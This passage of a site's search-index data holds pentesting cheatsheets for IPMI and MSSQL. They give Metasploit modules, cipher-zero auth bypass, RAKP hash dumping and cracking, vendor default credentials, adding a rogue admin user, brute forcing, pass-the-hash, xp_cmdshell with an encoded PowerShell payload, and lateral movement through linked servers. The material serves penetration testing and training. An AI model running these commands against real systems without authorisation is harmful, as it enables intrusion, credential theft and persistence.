bypass\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"metasploit-modules\"\u003eMetasploit Modules\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Version detection\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003euse auxiliary/scanner/ipmi/ipmi_version\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eset RHOSTS \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003erun\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Dump RAKP hashes (no auth needed)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003euse auxiliary/scanner/ipmi/ipmi_dumphashes\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eset RHOSTS \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003erun\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Cipher 0 auth bypass (unauthenticated admin access)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003euse auxiliary/scanner/ipmi/ipmi_cipher_zero\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eset RHOSTS \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003erun\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"ipmitool-direct-interaction\"\u003eipmitool (Direct Interaction)\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Version/status\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eipmitool -I lanplus -H \u0026lt;ip\u0026gt; -U admin -P admin chassis status\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# List users\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eipmitool -I lanplus -H \u0026lt;ip\u0026gt; -U admin -P admin user list\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# LAN config\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eipmitool -I lanplus -H \u0026lt;ip\u0026gt; -U admin -P admin lan print\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Power control\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eipmitool -I lanplus -H \u0026lt;ip\u0026gt; -U admin -P admin power status\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eipmitool -I lanplus -H \u0026lt;ip\u0026gt; -U admin -P admin power reset\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Add user (post-compromise)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eipmitool -I lanplus -H \u0026lt;ip\u0026gt; -U admin -P admin user set name \u003cspan style=\"color:#ae81ff\"\u003e4\u003c/span\u003e hacker\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eipmitool -I lanplus -H \u0026lt;ip\u0026gt; -U admin -P admin user set password \u003cspan style=\"color:#ae81ff\"\u003e4\u003c/span\u003e Password1\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eipmitool -I lanplus -H \u0026lt;ip\u0026gt; -U admin -P admin user priv \u003cspan style=\"color:#ae81ff\"\u003e4\u003c/span\u003e \u003cspan style=\"color:#ae81ff\"\u003e4\u003c/span\u003e \u003cspan style=\"color:#75715e\"\u003e# Admin priv\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eipmitool -I lanplus -H \u0026lt;ip\u0026gt; -U admin -P admin user enable \u003cspan style=\"color:#ae81ff\"\u003e4\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"hash-cracking-after-rakp-dump\"\u003eHash Cracking (After RAKP Dump)\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Hashcat mode 7300 = IPMI2 RAKP HMAC-SHA1\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ehashcat -m \u003cspan style=\"color:#ae81ff\"\u003e7300\u003c/span\u003e hashes.txt wordlist.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ehashcat -m \u003cspan style=\"color:#ae81ff\"\u003e7300\u003c/span\u003e hashes.txt wordlist.txt -r rules/best64.rule\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"default-credentials\"\u003eDefault Credentials\u003c/h2\u003e\n\u003ctable\u003e\n\t\u003cthead\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003cth\u003eVendor / Interface\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003eUsername\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003eDefault Password\u003c/th\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/thead\u003e\n\t\u003ctbody\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003eDell iDRAC\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eroot\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003ecalvin\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003eHP iLO\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eAdministrator\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003e(printed on pull tab)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003eSupermicro IPMI\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eADMIN\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eADMIN\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003eIBM IMM\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eUSERID\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003ePASSW0RD\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003eCisco CIMC\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eadmin\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003epassword\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003eIntel RMM\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eadmin\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003e(blank)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/tbody\u003e\n\u003c/table\u003e\n\u003chr\u003e\n\u003ch2 id=\"key-vulnerabilities\"\u003eKey Vulnerabilities\u003c/h2\u003e\n\u003ctable\u003e\n\t\u003cthead\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003cth\u003eIssue\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003eDescription\u003c/th\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/thead\u003e\n\t\u003ctbody\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003eCipher 0\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eAllows unauthenticated auth bypass — attacker can set any password\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003eRAKP hash dump\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eIPMI spec allows anyone to request auth hash → offline crack\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003eDefault creds\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eMost systems ship with known default credentials\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003eAnonymous auth\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eSome BMCs allow completely anonymous access\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/tbody\u003e\n\u003c/table\u003e","title":"IPMI"},{"content":"MSSQL Enumeration Cheatsheet Default Ports: 1433 (TCP), 1434 (UDP — SQL Server Browser)\nDiscovery \u0026amp; Nmap Scripts nmap -p 1433 --script ms-sql-info \u0026lt;ip\u0026gt; nmap -p 1433 --script ms-sql-config \u0026lt;ip\u0026gt; nmap -p 1433 --script ms-sql-empty-password \u0026lt;ip\u0026gt; nmap -p 1433 --script ms-sql-brute \u0026lt;ip\u0026gt; nmap -sU -p 1434 --script ms-sql-dac \u0026lt;ip\u0026gt; # Discover dynamic ports via UDP nmap -p 1433 --script ms-sql-* \u0026lt;ip\u0026gt; # All MSSQL scripts Metasploit Modules use auxiliary/scanner/mssql/mssql_ping # Discovery + version use auxiliary/scanner/mssql/mssql_login # Brute force auth use auxiliary/admin/mssql/mssql_sql # Execute SQL query use auxiliary/admin/mssql/mssql_exec # OS command execution (xp_cmdshell) use auxiliary/admin/mssql/mssql_enum # Full enumeration use auxiliary/admin/mssql/mssql_enum_sql_logins # Enumerate SQL logins mssqlclient.py (impacket) # Connect with SQL auth python3 mssqlclient.py \u0026lt;user\u0026gt;:\u0026lt;pass\u0026gt;@\u0026lt;ip\u0026gt; # Connect with Windows auth python3 mssqlclient.py \u0026lt;domain\u0026gt;/\u0026lt;user\u0026gt;:\u0026lt;pass\u0026gt;@\u0026lt;ip\u0026gt; -windows-auth # Connect with hash (Pass-the-Hash) python3 mssqlclient.py \u0026lt;domain\u0026gt;/\u0026lt;user\u0026gt;@\u0026lt;ip\u0026gt; -hashes :\u0026lt;nthash\u0026gt; -windows-auth Useful SQL Queries -- Version and user info SELECT @@version; SELECT system_user; SELECT user_name(); SELECT DB_NAME(); -- Check if sysadmin SELECT IS_SRVROLEMEMBER(\u0026#39;sysadmin\u0026#39;); SELECT IS_MEMBER(\u0026#39;db_owner\u0026#39;); -- List databases SELECT name FROM sys.databases; USE \u0026lt;database\u0026gt;; SELECT table_name FROM information_schema.tables; -- List users and roles SELECT name, type_desc FROM sys.server_principals; SELECT name FROM sys.syslogins; SELECT roles.name FROM sys.server_role_members JOIN sys.server_principals AS roles ON roles.principal_id = server_role_members.role_principal_id JOIN sys.server_principals AS members ON members.principal_id = server_role_members.member_principal_id WHERE members.name = \u0026#39;\u0026lt;user\u0026gt;\u0026#39;; xp_cmdshell (OS Command Execution) -- Enable xp_cmdshell (requires sysadmin) EXEC sp_configure \u0026#39;show advanced options\u0026#39;, 1; RECONFIGURE; EXEC sp_configure \u0026#39;xp_cmdshell\u0026#39;, 1; RECONFIGURE; -- Run commands EXEC xp_cmdshell \u0026#39;whoami\u0026#39;; EXEC xp_cmdshell \u0026#39;net user\u0026#39;; EXEC xp_cmdshell \u0026#39;powershell -enc \u0026lt;base64payload\u0026gt;\u0026#39;; Linked Servers (Lateral Movement) -- Enumerate linked servers SELECT * FROM sys.servers; EXEC sp_linkedservers; -- Execute query on linked server EXECUTE(\u0026#39;SELECT @@version\u0026#39;) AT [\u0026lt;linked_server\u0026gt;]; EXECUTE(\u0026#39;SELECT system_user\u0026#39;) AT [\u0026lt;linked_server\u0026gt;]; -- Execute OS command via linked server EXECUTE(\u0026#39;EXEC xp_cmdshell \u0026#39;\u0026#39;whoami\u0026#39;\u0026#39;\u0026#39;) AT [\u0026lt;linked_server\u0026gt;]; Brute Force hydra -l sa -P wordlist.txt mssql://\u0026lt;ip\u0026gt; medusa -h \u0026lt;ip\u0026gt; -u sa -P wordlist.txt -M mssql crackmapexec mssql \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -p wordlist.txt File Read / Write -- Read file (via BULK INSERT or OPENROWSET) SELECT * FROM OPENROWSET(BULK \u0026#39;C:\\Windows\\win.ini\u0026#39;, SINGLE_CLOB) AS t; -- Write file (via xp_cmdshell) EXEC xp_cmdshell \u0026#39;echo hacked \u0026gt; C:\\inetpub\\wwwroot\\shell.txt\u0026#39;; ","permalink":"https://d3vilsec.com/cheatsheets/pentesting/footprinting/mssql/","summary":"\u003ch1 id=\"mssql-enumeration-cheatsheet\"\u003eMSSQL Enumeration Cheatsheet\u003c/h1\u003e\n\u003cp\u003e\u003cstrong\u003eDefault Ports:\u003c/strong\u003e 1433 (TCP), 1434 (UDP — SQL Server Browser)\u003c/p\u003e\n\u003chr\u003e\n\u003ch2 id=\"discovery--nmap-scripts\"\u003eDiscovery \u0026amp; Nmap Scripts\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e1433\u003c/span\u003e --script ms-sql-info \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e1433\u003c/span\u003e --script ms-sql-config \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e1433\u003c/span\u003e --script ms-sql-empty-password \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e1433\u003c/span\u003e --script ms-sql-brute \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -sU -p \u003cspan style=\"color:#ae81ff\"\u003e1434\u003c/span\u003e --script ms-sql-dac \u0026lt;ip\u0026gt; \u003cspan style=\"color:#75715e\"\u003e# Discover dynamic ports via UDP\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e1433\u003c/span\u003e --script ms-sql-* \u0026lt;ip\u0026gt; \u003cspan style=\"color:#75715e\"\u003e# All MSSQL scripts\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"metasploit-modules\"\u003eMetasploit Modules\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003euse auxiliary/scanner/mssql/mssql_ping \u003cspan style=\"color:#75715e\"\u003e# Discovery + version\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003euse auxiliary/scanner/mssql/mssql_login \u003cspan style=\"color:#75715e\"\u003e# Brute force auth\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003euse auxiliary/admin/mssql/mssql_sql \u003cspan style=\"color:#75715e\"\u003e# Execute SQL query\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003euse auxiliary/admin/mssql/mssql_exec \u003cspan style=\"color:#75715e\"\u003e# OS command execution (xp_cmdshell)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003euse auxiliary/admin/mssql/mssql_enum \u003cspan style=\"color:#75715e\"\u003e# Full enumeration\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003euse auxiliary/admin/mssql/mssql_enum_sql_logins \u003cspan style=\"color:#75715e\"\u003e# Enumerate SQL logins\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"mssqlclientpy-impacket\"\u003emssqlclient.py (impacket)\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Connect with SQL auth\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003epython3 mssqlclient.py \u0026lt;user\u0026gt;:\u0026lt;pass\u0026gt;@\u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Connect with Windows auth\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003epython3 mssqlclient.py \u0026lt;domain\u0026gt;/\u0026lt;user\u0026gt;:\u0026lt;pass\u0026gt;@\u0026lt;ip\u0026gt; -windows-auth\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Connect with hash (Pass-the-Hash)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003epython3 mssqlclient.py \u0026lt;domain\u0026gt;/\u0026lt;user\u0026gt;@\u0026lt;ip\u0026gt; -hashes :\u0026lt;nthash\u0026gt; -windows-auth\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"useful-sql-queries\"\u003eUseful SQL Queries\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-sql\" data-lang=\"sql\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e-- Version and user info\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eSELECT\u003c/span\u003e \u003cspan style=\"color:#f92672\"\u003e@@\u003c/span\u003e\u003cspan style=\"color:#66d9ef\"\u003eversion\u003c/span\u003e;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eSELECT\u003c/span\u003e \u003cspan style=\"color:#66d9ef\"\u003esystem_user\u003c/span\u003e;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eSELECT\u003c/span\u003e user_name();\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eSELECT\u003c/span\u003e DB_NAME();\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e-- Check if sysadmin\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eSELECT\u003c/span\u003e IS_SRVROLEMEMBER(\u003cspan style=\"color:#e6db74\"\u003e\u0026#39;sysadmin\u0026#39;\u003c/span\u003e);\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eSELECT\u003c/span\u003e IS_MEMBER(\u003cspan style=\"color:#e6db74\"\u003e\u0026#39;db_owner\u0026#39;\u003c/span\u003e);\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e-- List databases\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eSELECT\u003c/span\u003e name \u003cspan style=\"color:#66d9ef\"\u003eFROM\u003c/span\u003e sys.databases;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eUSE \u003cspan style=\"color:#f92672\"\u003e\u0026lt;\u003c/span\u003e\u003cspan style=\"color:#66d9ef\"\u003edatabase\u003c/span\u003e\u003cspan style=\"color:#f92672\"\u003e\u0026gt;\u003c/span\u003e;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eSELECT\u003c/span\u003e \u003cspan style=\"color:#66d9ef\"\u003etable_name\u003c/span\u003e \u003cspan style=\"color:#66d9ef\"\u003eFROM\u003c/span\u003e information_schema.tables;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e-- List users and roles\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eSELECT\u003c/span\u003e name, type_desc \u003cspan style=\"color:#66d9ef\"\u003eFROM\u003c/span\u003e sys.server_principals;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eSELECT\u003c/span\u003e name \u003cspan style=\"color:#66d9ef\"\u003eFROM\u003c/span\u003e sys.syslogins;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eSELECT\u003c/span\u003e roles.name \u003cspan style=\"color:#66d9ef\"\u003eFROM\u003c/span\u003e sys.server_role_members\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u003cspan style=\"color:#66d9ef\"\u003eJOIN\u003c/span\u003e sys.server_principals \u003cspan style=\"color:#66d9ef\"\u003eAS\u003c/span\u003e roles \u003cspan style=\"color:#66d9ef\"\u003eON\u003c/span\u003e roles.principal_id \u003cspan style=\"color:#f92672\"\u003e=\u003c/span\u003e server_role_members.role_principal_id\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u003cspan style=\"color:#66d9ef\"\u003eJOIN\u003c/span\u003e sys.server_principals \u003cspan style=\"color:#66d9ef\"\u003eAS\u003c/span\u003e members \u003cspan style=\"color:#66d9ef\"\u003eON\u003c/span\u003e members.principal_id \u003cspan style=\"color:#f92672\"\u003e=\u003c/span\u003e server_role_members.member_principal_id\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u003cspan style=\"color:#66d9ef\"\u003eWHERE\u003c/span\u003e members.name \u003cspan style=\"color:#f92672\"\u003e=\u003c/span\u003e \u003cspan style=\"color:#e6db74\"\u003e\u0026#39;\u0026lt;user\u0026gt;\u0026#39;\u003c/span\u003e;\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"xp_cmdshell-os-command-execution\"\u003exp_cmdshell (OS Command Execution)\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-sql\" data-lang=\"sql\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e-- Enable xp_cmdshell (requires sysadmin)\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eEXEC\u003c/span\u003e sp_configure \u003cspan style=\"color:#e6db74\"\u003e\u0026#39;show advanced options\u0026#39;\u003c/span\u003e, \u003cspan style=\"color:#ae81ff\"\u003e1\u003c/span\u003e;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eRECONFIGURE;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eEXEC\u003c/span\u003e sp_configure \u003cspan style=\"color:#e6db74\"\u003e\u0026#39;xp_cmdshell\u0026#39;\u003c/span\u003e, \u003cspan style=\"color:#ae81ff\"\u003e1\u003c/span\u003e;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eRECONFIGURE;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e-- Run commands\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan 